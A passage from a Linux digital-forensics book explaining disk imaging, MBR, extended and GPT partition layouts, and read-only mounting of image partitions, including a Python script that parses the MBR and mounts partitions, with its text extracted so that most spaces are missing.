CREATINGANIMAGEFROMAVIRTUALMACHINEWhileyouarenotlikelytoneedtocreateanimagefromavirtualmachineprofessionally,youmightwish to do so if you are practicing and/or following alongwith someof theexamplesfromthisbook.Ifallyouneedisarawimage,youcanusethetoolsthatcomewithVirtualBoxinordertocreatearawimage.

One downside of using theVirtualBox tools is that youwon’t get the hashes dcflddprovides.Anotherdownsideisthatyouwon’tgettopracticeusingthetoolsyouneedforimaging a physical drive. The command to create the image from a Linux host isvboxmanage clonehd <virtual disk image file> <output rawimagefile>—formatRAW.

IfyouarehostingyourvirtualmachineonLinux,youcanstilluse thestandard toolssuchasdcfldd.ThereasonthatthisworksisthatLinuxissmartenoughtotreatthisvirtualimage file like a real device. This can be verified by running the command fdisk<virtual disk image file>. The results of running this command against avirtualmachineharddriveareshowninFigure4.3.

FIGURE4.3

Resultsofrunningfdiskagainstavirtualmachineimage.

CREATINGANIMAGEFROMAPHYSICALDRIVECreatingan imagefromphysicalmedia isaprettysimpleprocess if themediahasbeenremoved.Youcanuseacommercialwriteblockerifyouhaveone.Personally,Iprefertousetheudevrules-basedsystemdescribedearlierinthischapter.Regardlessofwhatyouuseforwriteblocking,IstronglyrecommendyouuseUSB3.0devices.

MypersonalsetupconsistsofaSabrentUSB3.0hubmodelHB-UM43whichprovideswriteblockingviamyudevrulessystemandaSabrentUSB3.0SATAdrivedockmodelDS-UBLK.ThiscombinationcanbepurchasedfrommultiplevendorsforunderUS$40.MysetupisshowninFigure4.4.

FIGURE4.4

Anaffordablediskimagingsystem.

SUMMARYInthischapterwediscussedhowtocreatediskimages.Thisincludedimagingtoolssuchas dcfldd, software and hardwarewrite-blockers, techniques, and inexpensive hardwareoptions.Inthenextchapterwewilldelveintothetopicofactuallymountingtheseimagessowecanbeginourdead(filesystem)analysis.

CHAPTER

5MountingImagesINFORMATIONINTHISCHAPTER:

MasterBootRecord-basedPartitionsExtendedPartitionsGUIDPartitionTablePartitionsMountingPartitionsUsingPythontoAutomatetheMountingProcess

PARTITIONBASICSIt was common for early personal computers to have a single filesystem on their harddrives.Ofcourse itwasalsocommonfor theircapacities tobemeasured insingledigitmegabytes. Once drives started becoming larger, people began organizing them intopartitions.

Initially up to four partitions were available. When this was no longer enough, anineloquentsolution,knownasextendedpartitions,wasdevelopedinordertoallowmorethanfourpartitions tobecreatedonadrive.Peopleputupwith thiskludgefordecadesbeforeabettersolutionwasdeveloped.Allofthesepartitioningsystemswillbediscussedindetailinthischapterstartingwiththeoldest.

Hard drives are described by the number of read/write heads, cylinders, and sectors.Eachplatterhascirclesofdatawhicharecalledtracks.Whenyoustackmultiplecirclesontopofeachothertheystarttolooklikeacylinderandthatisexactlywhatwecalltracksthat areon topof eachother physically.Evenwhen there is onlyoneplatter, there is atrackoneachsideof theplatter.Thetracksaredividedintochunkscalledsectors.HarddiskgeometryisshowninFigure5.1.

FIGURE5.1

Harddiskgeometry.

You will see entries for cylinders, heads, and sectors in some of the data structuresdiscussed in this chapter. Most modern media use logical block addressing, but theseremnantsofanearliertimearestillfound.Whetherornotthesevaluesareusedisanotherstory.

MASTERBOOTRECORDPARTITIONSThe firstmethod of havingmultiple partitionswas to create something called aMasterBootRecord(MBR)onthefirstsectoroftheharddisk.Thiswasdevelopedwaybackinthe 1980s.Amaximum of four partitions are permitted in theMaster BootRecord.Atmost one of these four partitions can bemarked as bootable. The overall format for aMBRisshowninTable5.1.

Table5.1.MasterBootRecordFormat

Offset Length Item

0(0x00) 446(0x1BE) Bootcode

446(0x1BE) 16(0x10) Firstpartition

462(0x1CE) 16(0x10) Secondpartition

478(0x1DE) 16(0x10) Thirdpartition

494(0x1EE) 16(0x10) Fourthpartition

510(0x1FE) 2(0x2) Signature0x550xAA

EachofthepartitionentriesintheMBRcontainstheinformationshowninTable5.2.

Table5.2.PartitionEntryFormat

Offset Length Item

0(0x00 1(0x01) Activeflag(0x80=bootable)

1(0x01) 1(0x01) Starthead

2(0x02) 1(0x01) Startsector(bits0-5);upperbitsofcylinder(6-7)

3(0x03) 1(0x01) Startcylinderlowest8bits

4(0x04) 1(0x01) Partitiontypecode(0x83=Linux)

5(0x05) 1(0x01) Endhead

6(0x06) 1(0x01) Endsector(bits0-5);upperbitsofcylinder(6-7)

7(0x07) 1(0x01) Endcylinderlowest8bits

8(0x08) 4(0x04) Sectorsprecedingpartition(littleendian)

12(0x0C) 4(0x04) Sectorsinpartition

Let’sdiscussthesefieldsinthepartitionentriesoneatatime.Thefirstentryisanactiveflagwhere0x80meansactiveandanythingelse(usually0x00)isinterpretedasinactive.IntheMasterBootRecordactivemeansitisbootable.Forobviousreasonstherecanbeatmostonebootablepartition.Thatdoesn’tmean thatyoucannotbootmultipleoperatingsystems,justthatyoumustboottosomesortofselectionmenuprogramtodoso.

The next entry is the starting head for the partition. This is followed by the startingsectorandcylinder.Becausethenumberofcylindersmightexceed255anditisunlikelythatsomanysectorswouldbeinasingletrack,theuppertwobitsfromthebytestoringthesectoraretheuppertwobitsforthecylinder.Thissystemallowsupto64sectorspertrackand1024cylinders.Notethatwithonlythreebytesofstoragepartitionsmustbeginwithinthefirsteightgigabytesofthediskassumingstandard512bytesectors.

Theentryfollowingthestartingaddressisapartitiontypecode.ForWindowssystemsthistypecodeisusedtodeterminethefilesystemtype.Linuxsystemsnormallyuse0x83as the partition type and any supported filesystem may be installed on the partition.Partitiontype0x82isusedforLinuxswappartitions.

Thecylinder/head/sectoraddressof theendof thepartition follows thepartition type.Thesameformat isusedas that for thestartingaddressof thepartition.Thenumberofsectors preceding the partition and total sectors occupy the last two positions in thepartition entry. Note that these are both 32-bit values which allows devices up to twoterabytes (2048 gigabytes) to be supported. Most modern devices use Logical BlockAddressing(LBA)andthecylinder/head/sectoraddressesareessentiallyignored.

EXTENDEDPARTITIONSWhen four partitionswere no longer enough, a new systemwas invented. This systemconsistsofcreatingoneormoreextendedpartitionsinthefouravailableslotsintheMBR.Themostcommonextendedpartitiontypesare0x05and0x85,withtheformerusedbyWindowsandLinuxandthelaterusedonlybyLinux.EachextendedpartitionbecomesalogicaldrivewithanMBRof itsown.Normallyonly thefirst twoslots in theextendedpartitionMBRareused.

The addresses in partition entries in the extended partition’sMBR are relative to thestartoftheextendedpartition(itisitsownlogicaldriveafterall).Logicalpartitionsintheextendedpartitioncanalsobeextendedpartitions.Inotherwords,extendedpartitionscanbe nested which allowsmore than eight partitions to be created. In the case of nestedextendedpartitions,thelastpartitionisindicatedbyanemptyentryinthesecondslotinthatextendedpartition’sMBR.NestedextendedpartitionsareshowninFigure5.2.

FIGURE5.2

NestedExtendedPartitions.

GUIDPARTITIONSThemethodofcreatingpartitionsisnot theonlythingshowingitsage.TheBasicInputOutputSystem(BIOS)bootprocessisalsoquiteoutdated.UndertheBIOSbootprocessanultramodern64-bitcomputerisnotstartedin64-bitmode.Itisn’tevenstartedin32-bitmode.TheCPUisforcedtoregressallthewaybackto16-bitcompatibilitymode.Infact,ifyouexaminethebootcodeintheMBRyouwilldiscoverthatitis16-bitmachinecode.

The BIOS boot process has been replaced with the Unified Extensible FirmwareInterface(UEFI)bootprocess.UEFI(pronouncedooh-fee)bootingallowsacomputertostartin64-bitmodedirectly.All64-bitcomputersshippedtodayuseUEFIandnotBIOSforbooting, although they support legacybooting fromMBR-baseddrives.This legacysupportisprimarilyintendedtoallowbootingfromremovablemediasuchasDVDsandUSBdrives.

Anewmethodof specifyingpartitionswas also created to go alongwithUEFI.ThisnewmethodassignsaGloballyUnique Identifier (GUID) toeachpartition.TheGUIDsare stored in aGUID Partition Table (GPT). TheGPT has space for 128 partitions. Inaddition to the primary GPT, there is a secondary GPT stored at the end of the disk(highest numbered logical block) to mitigate the chances of bad sectors in the GPTrenderingadiskunreadable.

AdriveusingGUIDpartitioningbeginswithaprotectiveMBR.ThisMBRhasasingle

entry covering the entire diskwith a partition type of 0xEE.Legacy systems that don’tknowhowtoprocessaGPTalsodon’tknowwhattodowithapartitionoftype0xEEsothey will ignore the entire drive. This is preferable to having the drive accidentallyformattedifitappearsemptyorunformatted.

As has been mentioned previously, modern systems use Logical Block Addressing(LBA).TheprotectiveMBRisstoredinLBA0.TheprimaryGPTbeginswithaheaderinLBA1,followedbyGPTentriesinLBA2throughLBA34.EachGPTentryrequires128bytes.Asaresult, therearefourentriesperstandard512byteblock.WhileGPTentriesare128bytestoday, thespecificationallowsfor largerentries(withsizespecifiedintheGPTheader)tobeusedinthefuture.Blocksareprobably512byteslong,butthisshouldnotbeassumed.ThesecondaryGPTheaderisstoredinthelastLBAandthesecondaryGPT entries are stored in the preceding 32 sectors.The layout of aGPT-based drive isshowninFigure5.3.

FIGURE5.3

LayoutofadrivewithGUIDpartitioning.

TheGPTheader format is shown inTable 5.3.When attempting tomount imagesofdrivesusingGUIDpartitioning,thisheadershouldbecheckedinordertofutureproofanyscriptsshouldthedefaultvaluesshowninthetablechange.

Table5.3.GUIDPartitionTableHeaderFormat.

Offset Length Contents

0(0x00) 8bytes Signature(“EFIPART”or0x5452415020494645)

8(0x08) 4bytes RevisioninBinaryCodedDecimalformat(version1.0=0x000x000x010x00)

12(0x0C) 4bytes Headersizeinbytes(92bytesatpresent)

16(0x10) 4bytes HeaderCRC32checksum

20(0x14) 4bytes Reserved;mustbezero

24(0x18) 8bytes CurrentLBA(wherethisheaderislocated)

32(0x20) 8bytes BackupLBA(wheretheotherheaderislocated)

40(0x28) 8bytes FirstusableLBAforpartitions

48(0x30) 8bytes LastusableLBAforpartitions

56(0x38) 16bytes DiskGUID

72(0x48) 8bytes StartingLBAofarrayofpartitionentries

80(0x50) 4bytes Numberofpartitionentriesinarray

84(0x54) 4bytes Sizeofasinglepartitionentry(usually128)

88(0x58) 4bytes CRC32checksumofthepartitionarray

92(0x5C) — Reserved;mustbezeroesfortherestoftheblock

TheformatforeachpartitionentryisshowninTable5.4.TheformatfortheattributesfieldintheseentriesisshowninTable5.5.UnlikeMBR-basedpartitionswithonebytetoindicate partition type, GPT-based partitions have a 16-byte GUID for specifying thepartition type. This type GUID is followed by a partition GUID (essentially a serialnumber)whichisalsosixteenbyteslong.YoumightseeLinuxdocumentationrefertothispartitionGUIDasaUniversallyUniqueIdentifier(UUID).

Table5.4.GUIDPartitionTableEntryFormat.

Offset Length Item

0(0x00 16(0x10) PartitiontypeGUID

16(0x10) 16(0x10) UniquepartitionGUID

32(0x20) 8(0x08) FirstLBA

40(0x28) 8(0x08) LastLBA

48(0x30) 8(0x08) Attributes

56(0x38) 72(0x48) Partitionname(UTF-16encoding)

Table5.5.GUIDPartitionTableEntryAttributesFormat.

Bit Content Description

0 Systempartition Mustpreservepartitionasis

1 EFIFirmware Operatingsystemshouldignorethispartition

2 LegacyBIOSboot Equivalentto0x80inMBR

3-47 Reserved Shouldbezeros

48-63 Typespecific Variesbypartitiontype(60=RO,62=Hidden,63=NoautomountforWindows)

The start and end LBA follow the UUID. Next comes the attributes and then thepartitionnamewhichcanbeupto36Unicodecharacterslong.Attributefieldsare64bitslong. As can be seen in Table 5.5, the lowest three bits are used to indicate a systempartition,firmwarepartition,andsupportforlegacyboot.Systempartitionsarenottobechangedandfirmwarepartitionsaretobecompletelyignoredbyoperatingsystems.Themeaningoftheuppersixteenbitsoftheattributefielddependsonthepartitiontype.

MOUNTINGPARTITIONSFROMANIMAGEFILEONLINUXLinux is the best choice for a forensics platform for several reasons, regardless ofoperatingsystemusedbythesubjectsystem.Oneofthemanyreasonsthatthisistrueisthe easewithwhich an image file can bemounted.Once filesystems in an image havebeenmountedallofthestandardsystemtoolscanbeusedaspartoftheinvestigation.

Linuxtools,suchasfdisk,canalsobeuseddirectlyonanimagefile.Thisfactmightnotbeimmediatelyobvious,butwewillshowittobetrue.ThekeytobeingabletouseournormaltoolsisLinux’ssupportforloopdevices.Inanutshell,aloopdeviceallowsa

filetobetreatedasablockdevicebyLinux.

Thecommand for runningfdiskonan image is simplyfdisk<imagefile>.Afterfdisk hasbeen run, thepartition table is easilyprintedby typingp<enter>.Thekeypieceofinformationyouneedforeachpartitiontomountitisthestartingsector(LBA). The results of running fdisk and printing the partition table for a WindowsvirtualmachineimageareshowninFigure5.4.NotethatinmostcaseswedonotneedtoknowthepartitiontypeastheLinuxmountcommandissmartenoughtofigurethisoutonitsown.

ThesingleprimarypartitionintheimagefromFigure5.4beginsatsector63.Inordertomountthisimageweneedtofirstcreateamountpointdirectorybytypingsudomkdir<mountpoint>, i.e.sudomkdir/media/win-c.Nextwe need tomount thefilesystemusing themount command.The general syntax for the command ismount[options]<sourcedevice><mountpointdirectory>.

FIGURE5.4

Running fdisk on an image file. Note that root privileges are not required to run fdisk on an image. Thestartingsectorwillbeneededlaterformounting.

Theoptionsrequiredtomountanimageinaforensicallysoundwayarero(read-only)andnoatime(noaccesstimeupdating).Thesecondoptionmightseemunnecessary,butitinsuresthatcertaininternaltimestampsarenotupdatedaccidentally.Mountinganimagefilerequirestheloopandoffsetoptions.

Putting all of these together, the full mount command is sudo mount -oro,noatime,loop,offset=<offset to start of partition inbytes> <image file> <mount point directory>. The offset can becalculated using a calculator or a little bash shell trick. Just like commands can be

executedbyenclosing them in$(),youcandomathon thecommand linebyenclosingmathematicaloperationsin$(()).

Using our bash shell trick, the proper command is sudo mount -oro,noatime,loop,offset=$((<startingsector>*512))<imagefile><mountpointdirectory>.TheseriesofcommandstomounttheimagefromFigure5.4areshowninFigure5.5.

FIGURE5.5

Mountingasingleprimarypartitionfromanimagefile.

Whatifyourimagecontainsextendedpartitions?Theprocedureisexactlythesame.AnimagewithanextendedpartitionisshowninFigure5.6.Notethatfdisktranslatestherelativesectoraddressesinsidetheextendedpartitiontoabsoluteaddressesintheoverallimage.Alsonote that theswappartition inside theextendedprimarypartitionstarts twosectors into thepartition.The first sector isusedby the extendedpartition’smini-MBRand the second is just padding to make the swap partition start on an even-numberedsector.

Themini-MBRfrom theextendedpartition in the image fromFigure5.6 is shown inFigure5.7.Thepartitiontype,0x82,ishighlightedinthefigure.RecallthatthisisthetypecodeforaLinuxswappartition.NoticethatthesecondMBRentryisblankindicatingthatthere are no extended partitions nested inside this one. Thedd command was used togeneratethisfigure.

FIGURE5.6

Animagefilewithanextendedpartition.

FIGURE5.7

Amini-MBRfromanextendedpartition.Thehighlightedbyteisforthepartition,0x82,whichindicatesthisisaswappartition.Notethatthesecondentryisblankindicatingtherearenonestedextendedpartitionsunderthisone.

Aquickwaytoviewasinglesectorfromanimageistoissuethecommandddskip=

<sector number> bs=<sector size> count=1 if=<image file> |xxd.The commandused togenerateFigure5.7wasddskip=33556478bs=512count=1 if=pentester-academy-subject1-flat.vmdk | xxd. It isimportanttorealizethatddusesblocks(withadefaultblocksizeof512)whereasmountusesbytes.Thisiswhywedon’thavetodoanymathtousedd.

The commands required and also the results ofmounting the primary partition fromFigure5.6areshowninFigure5.8.NoticethatmyUbuntusystemautomaticallypoppedupthefilebrowserwindowshown.Thisisanexampleofbehaviorthatcanbecustomizedusingudevrulesasdescribedearlierinthisbook.

FIGURE5.8

MountingaLinuxpartitioninanimagefromthecommandline.

What if your subject system is using GUID Partition Tables (GPT)? The results ofrunning fdisk against such a system are shown in Figure 5.9. The only partitiondisplayedcoverstheentirediskandhastype0xEE.ThisistheprotectiveMBRdiscussedearlierinthischapter.NotethatfdiskdisplaysawarningthatincludesthecorrectutilitytorunforGPTdrives.

FIGURE5.9

RunningfdiskonadrivethatusesGUIDPartitionTables.

TheresultsofrunningpartedontheGPTdrivefromFigure5.9areshowninFigure5.10.Inthefigureweseeasystempartitionwhichismarkedasbootable,severalNTFSpartitions,anext4andLinuxswappartitions.ThisisacomputerthatcamepreloadedwithWindows8.1withsecureboot(whichreallymeansmakeitdifficulttobootanythingotherthanWindows)whichhashadLinuxinstalledafterthefact.

FIGURE5.10

ResultofrunningpartedontheGPTdrivefromFigure5.9.

YoumayhavenoticedthattheresultsdisplayedinFigure5.10specifythestartandstopofpartitionsinkilobytes,megabytes,andgigabytes.Inordertomountapartitionweneedto know the exact start of each partition. The unit command inparted allows us tospecifyhowthesevaluesaredisplayed.TwopopularchoicesaresandBwhichstandforsectorsandbytes,respectively.TheresultsofexecutingthepartedprintcommandusingbothsectorsandbytesareshowninFigure5.11.

FIGURE5.11

Changingthedefaultunitsinpartedtoshowpartitionboundariesinsectorsandbytes.

Oncethestartingoffsetisknown,mountingapartitionfromaGPTimageisexactlythesameas theprecedingtwocases(primaryorextendedpartitionsonMBR-baseddrives).ThepartedutilitycanbeusedonMBR-baseddrivesaswell,but thedefaultoutput isnot as easy to use. Next we will discuss using Python to make this mounting processsimpleregardlessofwhatsortofpartitionsweareattemptingtomount.

USINGPYTHONTOAUTOMATETHEMOUNTINGPROCESSAutomation is a good thing. It saves time and also prevents mistakes caused by fat-fingeringvalues.Uptothispointinthebookwehaveusedshellscriptingforautomation.Inorder tomountourpartitionswewillutilizethePythonscriptinglanguage.Asthis isnot a book on Python, I will primarily only be describing how my scripts work. Forreaders that want amore in-depth coverage of Python I highly recommend the PythoncourseatPentesterAcademy.com(http://www.pentesteracademy.com/course?id=1).

WHATISITGOODFOR?ScriptingorProgrammingLanguageYouwillseemerefer toPythonasascriptinglanguagein thisbook.Somemightsaythatitisaprogramminglanguage.Whichiscorrect?Theyarebothcorrect.Inmymindascriptinglanguageisaninterpretedlanguagethatallowsyoutoquicklydowork.Pythoncertainlymeetsthiscriteria.

To me, a programming language is something that is used to create largeprogramsandsoftwaresystems.TherearesomethatcertainlyhavedonethiswithPython. However, I would argue that Python is not the best choice whenperformanceisanissueandthesameprogramwillberunmanytimeswithoutanycode modifications. I’m sure that anyone who has ever run a recent version ofMetasploitwouldagreethatrunninglargeprogramswrittenininterpretedlanguagescanbepainful.

Youmightaskwhyweare switching toPython.This isavalidquestion.ThereareacoupleofreasonstousePythonforthistask.First,wearenolongerjustrunningprogramsandpushingbytesaround.Rather,wearereading infiles, interpreting them,performingcalculations,andthenrunningprograms.Second,wearelookingtobuildalibraryofcodeto use in our investigations.Having Python code that interpretsMBR andGPT data islikelytobeusefulfurtherdowntheroad.

MBR-basedprimarypartitionsWewill startwith the simplest case, primarypartitions fromMBR-baseddrives. I havebroken up the mounting code into three separate scripts for simplicity. Feel free tocombinethemif that iswhatyouprefer. It isopensourceafterall.ThefollowingscriptwillmountprimarypartitionsfromanMBR-basedimagefile.#!/usr/bin/python

#

#mount-image.py

#ThisisasimplePythonscriptthatwill

#attempttomountpartitionsfromanimagefile.

#Imagesaremountedread-only.

#

#DevelopedbyDr.PhilPolstra(@ppolstra)

#forPentesterAcademy.com

importsys

importos.path

importsubprocess

importstruct

“””

ClassMbrRecord:decodesapartitionrecordfromaMasterBootRecord

Usage:rec=MbrRecord(sector,partno)where

sectoristhe512byteorgreatersectorcontainingtheMBR

partnoisthepartitionnumber0-3ofinterest

rec.printPart()printspartitioninformation

“””

classMbrRecord():

def__init__(self,sector,partno):

self.partno=partno

#firstrecordatoffset446&recordsare16bytes

offset=446+partno*16

self.active=False

#firstbyte==0x80meansactive(bootable)

ifsector[offset]==‘\x80’:

self.active=True

self.type=ord(sector[offset+4])

self.empty=False

#partitiontype==0meansitisempty

ifself.type==0:

self.empty=True

#sectorvaluesare32-bitandstoredinlittleendianformat

self.start=struct.unpack(‘<I’,sector[offset+8:\

offset+12])[0]

self.sectors=struct.unpack(‘<I’,sector[offset+12:\

offset+16])[0]

defprintPart(self):

ifself.empty==True:

print(“<empty>”)

else:

outstr=“”

ifself.active==True:

outstr+=“Bootable:”

outstr+=“Type“+str(self.type)+“:”

outstr+=“Start“+str(self.start)+“:”

outstr+=“Totalsectors“+str(self.sectors)

print(outstr)

defusage():

print(“usage“+sys.argv[0]+

“<imagefile>\nAttemptstomountpartitionsfromanimagefile”)

exit(1)

defmain():

iflen(sys.argv)<2:

usage()

#readfirstsector

ifnotos.path.isfile(sys.argv[1]):

print(“File“+sys.argv[1]+“cannotbeopenedforreading”)

exit(1)

withopen(sys.argv[1],‘rb’)asf:

sector=str(f.read(512))

if(sector[510]==“\x55”andsector[511]==“\xaa”):

print(“LookslikeaMBRorVBR”)

#ifitisanMBRbytes446,462,478,and494mustbe0x80or0x00

if(sector[446]==‘\x80’orsector[446]==‘\x00’)and\

(sector[462]==‘\x80’orsector[462]==‘\x00’)and\

(sector[478]==‘\x80’orsector[478]==‘\x00’)and\

(sector[494]==‘\x80’orsector[494]==‘\x00’):

print(“MustbeaMBR”)

parts=[MbrRecord(sector,0),MbrRecord(sector,1),\

MbrRecord(sector,2),MbrRecord(sector,3)]

forpinparts:

p.printPart()

ifnotp.empty:

notsupParts=[0x05,0x0f,0x85,0x91,0x9b,0xc5,0xe4,0xee]

ifp.typeinnotsupParts:

print(“SorryGPTandextendedpartitionsare“+“notsupportedbythisscript!”)

else:

mountpath=‘/media/part%s’%str(p.partno)

#iftheappropriatedirectorydoesn’texistcreateit

ifnotos.path.isdir(mountpath):

subprocess.call([‘mkdir’,mountpath])

mountopts=‘loop,ro,noatime,offset=%s’%\

str(p.start*512)

subprocess.call([‘mount’,‘-o’,\

mountopts,sys.argv[1],mountpath])

else:

print(“AppearstobeaVBR\nAttemptingtomount”)

ifnotos.path.isdir(‘/media/part1’):

subprocess.call([‘mkdir’,‘/media/part1’])

subprocess.call([‘mount’,‘-o’,‘loop,ro,noatime’,\

sys.argv[1],‘/media/part1’])

if__name__==“__main__”:

main()

Let’sbreakdowntheprecedingscript.Itbeginswiththeusualshe-bang;however,thistimewe are running the Python interpreter instead of the bash shell. Just aswith shellscripts,allofthelinesbeginningwith“#”arecomments.WethenimportPythonlibrariessys, os.path, subprocess, and struct which are needed to get command line arguments,checkfortheexistenceoffiles,launchotherprocessesorcommands,andinterpretvaluesintheMBR,respectively.

NextwedefineaclassMbrRecordwhichisusedtodecodethefourpartitionentriesintheMBR.TheclassdefinitionisprecededwithaPythonmulti-linecommentknownasadocstring. Three double quotes on a line start or stop the docstring. Likemany object-oriented languages, Python uses classes to implement objects. Python is different fromotherlanguagesinthatitusesindentationtogrouplinesofcodetogetheranddoesn’tusealineterminationcharactersuchasthesemicolonusedbynumerouslanguages.

ThelineclassMbrRecord():tellsthePythoninterpreterthataclassdefinitionfortheMbrRecordclassfollowsonindentedlines.Theemptyparenthesesindicatethatthereis no base class. In otherwords, theMbrRecord is not amore specific (or specialized)versionofsomeotherobject.Baseclassescanbeusefulastheyallowyoutomoreeasilyandeloquentlysharecommoncode,buttheyarenotusedextensivelybypeoplewhousePythontowritequickanddirtyscriptstogetthingsdone.

The line def __init__(self, sector, partno): inside the MbrRecordclass definition begins a function definition. Python allows classes to define functions(sometimes called methods) and values (also called variables, parameters, or datamembers)thatareassociatedwiththeclass.Everyclassimplicitlydefinesavaluecalledself that is used to refer to an object of the class type. With a few exceptions (notdescribed in this book) every class functionmust have self as the first (possibly only)argument it accepts. This argument is implicitly passed by Python.We will talk moreaboutthislaterasIexplainthisscript.

Everyclass shoulddefinean__init__ function (that is adoubleunderscoreprecedingandfollowinginit).Thisspecialfunctioniscalledaconstructor.Itisusedwhenanobjectof a certain type is created. The __init__ function in the MbrRecord class is used asfollows:

partition=MbrRecord(sector,partitionNumber)

ThiscreatesanewobjectcalledpartitionoftheMbrRecordtype.IfwewanttoprintitscontentswecancallitsprintPartfunctionlikeso:

partition.printPart()

Back to the constructor definition.We first store the passed in partition number in aclassvalueonthelineself.partno=partno.Thenwecalculatetheoffsetintothe

MBRforthepartitionofinterestwithoffset=446+partno*16,asthefirstrecordisatoffset446andeachrecordis16byteslong.

Nextwechecktoseeifthefirstbyteinthepartitionentryis0x80whichindicatesthepartition is active (bootable). Python, like many other languages, can treat strings asarrays.Also,likemostlanguages,theindexesarezero-based.The==operatorisusedtocheckequalityandthe=operatorisusedforassignment.AsinglebytehexadecimalvalueinPython canbe representedby a packed string containing a “\x”prefix.For example,‘\x80’inourscriptmeans0x80.PuttingallofthistogetherweseethatthefollowinglinessetaclassvaluecalledactivetoFalseandthenresetsthevaluetoTrueifthefirstbyteinapartitionentryis0x80.NotethatPythonusesindentationtodeterminewhatisruniftheifstatementevaluatestoTrue.

self.active=False

#firstbyte==0x80meansactive(bootable)

ifsector[offset]==‘\x80’:

self.active=True

Afterinterpretingtheactiveflag,theMbrRecordconstructorretrievesthepartitiontypeandstoresitasanumericalvalue(notapackedstring)onthelineself.type=ord(sector[offset+4]). The construct ord(<single character>) is used toconvertapackedstringintoanintegervalue.Next thetypeischeckedforequalitywithzero.Ifitiszero,theclassvalueofemptyissettoTrue.

Finally, the starting and total sectors are extracted from the MBR and stored inappropriate class values. There is a lot happening in these two lines. It is easier tounderstanditifyoubreakitdown.Wewillstartwiththestatementsector[offset+8:offset+12]. In Python parlance this is known as an array slice.An array isnothingbutalistofvaluesthatareindexedwithzero-basedintegers.SomyArray[0]isthefirstiteminmyArray,myArray[1]isthesecond,etc.Tospecifyasubarray(slice)inPython the syntax ismyArray[<firstindexofslice>:<lastindexofslice+1>].Forexample,ifmyArraycontains“Thisistheend,myonetruefriend!”thenmyArray[8:15]wouldbeequalto“theend”.

Theslicesintheselasttwolinesoftheconstructorcontain32-bitlittleendianintegersinpacked string format. If you are unfamiliarwith the term little endian, it refers to howmulti-bytevaluesare stored inacomputer.Nearlyall computersyouare likely toworkwith while doing forensics store values in little endian format which means bytes arestored from least tomost significant.For example, thevalue0xAABBCCDDwouldbestoredas0xDD0xCC0xBB0xAAor‘\xDD\xCC\xBB\xAA’inpackedstringformat.Theunpackfunctionfromthestructlibraryisusedtoconvertapackedstringintoanumericalvalue.

Recallthatthestructlibrarywasoneoftheimportedlibrariesatthetopofourscript.InorderforPythontofindthefunctionsfromtheseimportedlibrariesyoumustprefacethefunctionnameswiththelibraryfollowedbyaperiod.Thatiswhytheunpackfunctioniscalledstruct.unpackinourscript.Theunpackfunctiontakesaformatstringandapacked

stringasinput.Ourformatstring‘<I’specifiesanunsignedintegerinlittleendianformat.Theformatstringinputtotheunpackfunctioncancontainmorethanonespecifierwhichallowsunpacktoconvertmorethanonevalueatatime.Asaresult,theunpackfunctionreturnsanarray.Thatiswhyyouwillfind“[0]”ontheendofthesetwolinesasweonlywantthefirstiteminthereturnedarray(whichshouldbetheonlyitem!).Whenyoubreakit down, it is easy to see that self.start = struct.unpack(‘<I’,sector[offset + 8: offset + 12])[0] gets a 4-byte packed stringcontainingthestartingsectorinlittleendianformat,convertsittoanumericvalueusingunpack,andthenstorestheresultinaclassvaluenamedstart.

TheprintPartfunctioninMbrRecordisalittleeasiertounderstandthantheconstructor.First this function checks to see if the partition entry is empty; if so, it just prints“<empty>”.If it isnotempty,whetherornot it isbootable, its type,startingsector,andtotalsectorsaredisplayed.

Thescriptcreatesausagefunctionsimilartowhatwehavedonewithourshellscriptsin the past. Note that this function is not indented and, therefore, not part of theMbrRecordclass.Thefunctiondoesmakeuseofthesyslibrarythatwasimportedinordertoretrievethenameofthisscriptusingsys.argv[0]whichisequivalentto$0inourshellscripts.

We then define a main function. As with our shell scripts, we first check that anappropriatenumberofcommandlineargumentsarepassedin,and,ifnot,displayausagemessage and exit.Note that the test here is for less than twocommand line arguments.Therewill alwaysbeone command line argument, thenameof the scriptbeing run. Inother words, if len(sys.argv) < 2: will only be true if you passed in noarguments.

Oncewehaveverifiedthatyoupassedinatleastoneargument,wechecktoseeifthefilereallyexistsandisreadable,displayinganerrorandexitingifitisn’t,inthefollowinglinesofcode:ifnotos.path.isfile(sys.argv[1]):

print(“File“+sys.argv[1]+“cannotbeopenedforreading”)

exit(1)

ThenexttwolinesmightseemabitstrangeifyouarenotaPythonprogrammer(yet).ThisconstructisthepreferredwayofopeningandreadingfilesinPythonasitissuccinctand insures that your files will be closed cleanly. Even some readers who use Pythonmightnotbefamiliarwiththismethodasithasbeenavailableforlessthanadecade,andIhaveseensomerecentlypublishedPythonbooksinforensicsandinformationsecuritystillteaching people the old, non-preferredway of handling files.The two lines in questionfollow.

withopen(sys.argv[1],‘rb’)asf:

sector=str(f.read(512))

To fully understand why this is a beautiful thing, you need to first understand howPython handles errors. Like many other languages, Python uses exceptions for error

handling.Atahighlevelexceptionsworkasfollows.Anyriskycodethatmightgenerateanerror(whichiscalledthrowinganexception)isenclosedinatryblock.Thistryblockis followed by one ormore exception catching blocks thatwill process different errors(exception types). There is also an optional block, called a finally block, that is calledeverytimetheprogramexitsthetryblockwhetherornottherewasanerror.Thetwolinesaboveareequivalenttothefollowing:

try:

f=open(sys.argv[1],‘rb’)

sector=str(f.read(512))

exceptExceptionase:

print‘Anexceptionoccurred:’,e

finally:

f.close()

The file passed in to the script is opened as a read-only binary file because the ‘rb’argumentpassedtoopenspecifiesthefilemode.Whenthefileisopened,anewfileobjectnamedfiscreated.Thereadfunctionoffisthencalledandthefirst512bytes(containingtheMBR)areread.TheMBRisconvertedtoastringbyenclosingf.read(512)insidestr()and this string is stored in avariablenamed sector.Regardlessof anyerrors, the file isclosedcleanlybeforeexecutionofthescriptproceeds.

Once theMBRhasbeenreadwedoasanitycheck. If thefile isnotcorruptedor thewrongkindoffile,thelasttwobytesshouldbe0x550xAA.ThisisthestandardsignatureforanMBRorsomethingcalledaVolumeBootRecord(VBR).AVBRisabootsectorforaFileAllocationTable(FAT)filesystemusedbyDOSandolderversionsofWindows.TodistinguishbetweenaVBRandMBRwecheckthefirstbyteforeachMBRpartitionentryandverifythateachiseither0x80or0x00.Ifallfourentriescheckout,weproceedundertheassumptionthatitisanMBR.OtherwiseweassumeitisaVBRandmounttheonlypartitionstraightaway.

Thelineparts=[MbrRecord(sector,0),MbrRecord(sector,1),\

MbrRecord(sector,2),MbrRecord(sector,3)]

